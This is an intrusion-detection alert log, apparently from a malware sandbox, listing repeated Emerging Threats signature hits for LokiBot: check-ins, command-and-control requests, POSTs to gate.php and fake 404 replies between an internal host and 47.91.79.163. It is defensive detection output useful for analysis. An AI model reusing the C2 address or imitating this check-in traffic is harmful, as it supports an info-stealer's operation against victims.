                                    12/03/20-10:03:45.026278TCP2025483ET TROJAN LokiBot Fake 404 Response804992747.91.79.163192.168.2.3
                                    12/03/20-10:03:45.253695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.253695TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992880192.168.2.347.91.79.163
                                    12/03/20-10:03:45.313153TCP2025483ET TROJAN LokiBot Fake 404 Response804992847.91.79.163192.168.2.3
                                    12/03/20-10:03:45.764949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.764949TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4992980192.168.2.347.91.79.163
                                    12/03/20-10:03:45.849650TCP2025483ET TROJAN LokiBot Fake 404 Response804992947.91.79.163192.168.2.3
                                    12/03/20-10:03:46.322025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.322025TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993080192.168.2.347.91.79.163
                                    12/03/20-10:03:46.379667TCP2025483ET TROJAN LokiBot Fake 404 Response804993047.91.79.163192.168.2.3
                                    12/03/20-10:03:46.794392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.794392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993180192.168.2.347.91.79.163
                                    12/03/20-10:03:46.855204TCP2025483ET TROJAN LokiBot Fake 404 Response804993147.91.79.163192.168.2.3
                                    12/03/20-10:03:47.319622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.319622TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993280192.168.2.347.91.79.163
                                    12/03/20-10:03:47.379466TCP2025483ET TROJAN LokiBot Fake 404 Response804993247.91.79.163192.168.2.3
                                    12/03/20-10:03:47.887303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.887303TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993380192.168.2.347.91.79.163
                                    12/03/20-10:03:47.950901TCP2025483ET TROJAN LokiBot Fake 404 Response804993347.91.79.163192.168.2.3
                                    12/03/20-10:03:48.444667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.444667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993480192.168.2.347.91.79.163
                                    12/03/20-10:03:48.504372TCP2025483ET TROJAN LokiBot Fake 404 Response804993447.91.79.163192.168.2.3
                                    12/03/20-10:03:48.999385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.347.91.79.163
                                    12/03/20-10:03:48.999385TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993580192.168.2.347.91.79.163
                                    12/03/20-10:03:49.146350TCP2025483ET TROJAN LokiBot Fake 404 Response804993547.91.79.163192.168.2.3
                                    12/03/20-10:03:49.389665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.389665TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993680192.168.2.347.91.79.163
                                    12/03/20-10:03:49.483880TCP2025483ET TROJAN LokiBot Fake 404 Response804993647.91.79.163192.168.2.3
                                    12/03/20-10:03:49.706677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.706677TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993780192.168.2.347.91.79.163
                                    12/03/20-10:03:49.772139TCP2025483ET TROJAN LokiBot Fake 404 Response804993747.91.79.163192.168.2.3
                                    12/03/20-10:03:50.340955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.340955TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993880192.168.2.347.91.79.163
                                    12/03/20-10:03:50.486014TCP2025483ET TROJAN LokiBot Fake 404 Response804993847.91.79.163192.168.2.3
                                    12/03/20-10:03:50.701367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.701367TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4993980192.168.2.347.91.79.163
                                    12/03/20-10:03:50.762480TCP2025483ET TROJAN LokiBot Fake 404 Response804993947.91.79.163192.168.2.3
                                    12/03/20-10:03:51.232876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2025381ET TROJAN LokiBot Checkin4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.232876TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994180192.168.2.347.91.79.163
                                    12/03/20-10:03:51.295295TCP2025483ET TROJAN LokiBot Fake 404 Response804994147.91.79.163192.168.2.3
                                    12/03/20-10:03:51.745747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2025381ET TROJAN LokiBot Checkin4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.745747TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994280192.168.2.347.91.79.163
                                    12/03/20-10:03:51.805430TCP2025483ET TROJAN LokiBot Fake 404 Response804994247.91.79.163192.168.2.3
                                    12/03/20-10:03:52.011532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2025381ET TROJAN LokiBot Checkin4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.011532TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994480192.168.2.347.91.79.163
                                    12/03/20-10:03:52.069458TCP2025483ET TROJAN LokiBot Fake 404 Response804994447.91.79.163192.168.2.3
                                    12/03/20-10:03:52.540726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2025381ET TROJAN LokiBot Checkin4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.540726TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994580192.168.2.347.91.79.163
                                    12/03/20-10:03:52.673837TCP2025483ET TROJAN LokiBot Fake 404 Response804994547.91.79.163192.168.2.3
                                    12/03/20-10:03:53.132190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2025381ET TROJAN LokiBot Checkin4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.132190TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994680192.168.2.347.91.79.163
                                    12/03/20-10:03:53.203317TCP2025483ET TROJAN LokiBot Fake 404 Response804994647.91.79.163192.168.2.3
                                    12/03/20-10:03:53.741500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2025381ET TROJAN LokiBot Checkin4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.741500TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994880192.168.2.347.91.79.163
                                    12/03/20-10:03:53.800650TCP2025483ET TROJAN LokiBot Fake 404 Response804994847.91.79.163192.168.2.3
                                    12/03/20-10:03:54.013312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2025381ET TROJAN LokiBot Checkin4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.013312TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4994980192.168.2.347.91.79.163
                                    12/03/20-10:03:54.074158TCP2025483ET TROJAN LokiBot Fake 404 Response804994947.91.79.163192.168.2.3
                                    12/03/20-10:03:54.573092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2025381ET TROJAN LokiBot Checkin4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.573092TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995080192.168.2.347.91.79.163
                                    12/03/20-10:03:54.632228TCP2025483ET TROJAN LokiBot Fake 404 Response804995047.91.79.163192.168.2.3
                                    12/03/20-10:03:55.156588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2025381ET TROJAN LokiBot Checkin4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.156588TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995180192.168.2.347.91.79.163
                                    12/03/20-10:03:55.378946TCP2025483ET TROJAN LokiBot Fake 404 Response804995147.91.79.163192.168.2.3
                                    12/03/20-10:03:55.853547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2025381ET TROJAN LokiBot Checkin4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.853547TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995380192.168.2.347.91.79.163
                                    12/03/20-10:03:55.913942TCP2025483ET TROJAN LokiBot Fake 404 Response804995347.91.79.163192.168.2.3
                                    12/03/20-10:03:56.114180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2025381ET TROJAN LokiBot Checkin4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.114180TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995480192.168.2.347.91.79.163
                                    12/03/20-10:03:56.172661TCP2025483ET TROJAN LokiBot Fake 404 Response804995447.91.79.163192.168.2.3
                                    12/03/20-10:03:56.633629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2025381ET TROJAN LokiBot Checkin4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.633629TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995580192.168.2.347.91.79.163
                                    12/03/20-10:03:56.693409TCP2025483ET TROJAN LokiBot Fake 404 Response804995547.91.79.163192.168.2.3
                                    12/03/20-10:03:57.149827TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2025381ET TROJAN LokiBot Checkin4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.149827TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995680192.168.2.347.91.79.163
                                    12/03/20-10:03:57.219339TCP2025483ET TROJAN LokiBot Fake 404 Response804995647.91.79.163192.168.2.3
                                    12/03/20-10:03:57.692003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.692003TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995780192.168.2.347.91.79.163
                                    12/03/20-10:03:57.753940TCP2025483ET TROJAN LokiBot Fake 404 Response804995747.91.79.163192.168.2.3
                                    12/03/20-10:03:58.283328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.283328TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995880192.168.2.347.91.79.163
                                    12/03/20-10:03:58.343102TCP2025483ET TROJAN LokiBot Fake 404 Response804995847.91.79.163192.168.2.3
                                    12/03/20-10:03:58.547963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.547963TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4995980192.168.2.347.91.79.163
                                    12/03/20-10:03:58.604919TCP2025483ET TROJAN LokiBot Fake 404 Response804995947.91.79.163192.168.2.3
                                    12/03/20-10:03:58.821965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.821965TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996080192.168.2.347.91.79.163
                                    12/03/20-10:03:58.886666TCP2025483ET TROJAN LokiBot Fake 404 Response804996047.91.79.163192.168.2.3
                                    12/03/20-10:03:59.097646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.097646TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996180192.168.2.347.91.79.163
                                    12/03/20-10:03:59.154859TCP2025483ET TROJAN LokiBot Fake 404 Response804996147.91.79.163192.168.2.3
                                    12/03/20-10:03:59.376610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.376610TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996280192.168.2.347.91.79.163
                                    12/03/20-10:03:59.446843TCP2025483ET TROJAN LokiBot Fake 404 Response804996247.91.79.163192.168.2.3
                                    12/03/20-10:03:59.658099TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.658099TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996380192.168.2.347.91.79.163
                                    12/03/20-10:03:59.717549TCP2025483ET TROJAN LokiBot Fake 404 Response804996347.91.79.163192.168.2.3
                                    12/03/20-10:03:59.937167TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.937167TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996480192.168.2.347.91.79.163
                                    12/03/20-10:03:59.996311TCP2025483ET TROJAN LokiBot Fake 404 Response804996447.91.79.163192.168.2.3
                                    12/03/20-10:04:00.213594TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.213594TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996580192.168.2.347.91.79.163
                                    12/03/20-10:04:00.271773TCP2025483ET TROJAN LokiBot Fake 404 Response804996547.91.79.163192.168.2.3
                                    12/03/20-10:04:00.506450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.506450TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996680192.168.2.347.91.79.163
                                    12/03/20-10:04:00.568294TCP2025483ET TROJAN LokiBot Fake 404 Response804996647.91.79.163192.168.2.3
                                    12/03/20-10:04:00.791546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.791546TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996780192.168.2.347.91.79.163
                                    12/03/20-10:04:00.944044TCP2025483ET TROJAN LokiBot Fake 404 Response804996747.91.79.163192.168.2.3
                                    12/03/20-10:04:01.165537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.165537TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996880192.168.2.347.91.79.163
                                    12/03/20-10:04:01.224258TCP2025483ET TROJAN LokiBot Fake 404 Response804996847.91.79.163192.168.2.3
                                    12/03/20-10:04:01.475567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.475567TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4996980192.168.2.347.91.79.163
                                    12/03/20-10:04:01.535551TCP2025483ET TROJAN LokiBot Fake 404 Response804996947.91.79.163192.168.2.3
                                    12/03/20-10:04:01.768613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.768613TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997080192.168.2.347.91.79.163
                                    12/03/20-10:04:01.828971TCP2025483ET TROJAN LokiBot Fake 404 Response804997047.91.79.163192.168.2.3
                                    12/03/20-10:04:02.064175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.347.91.79.163
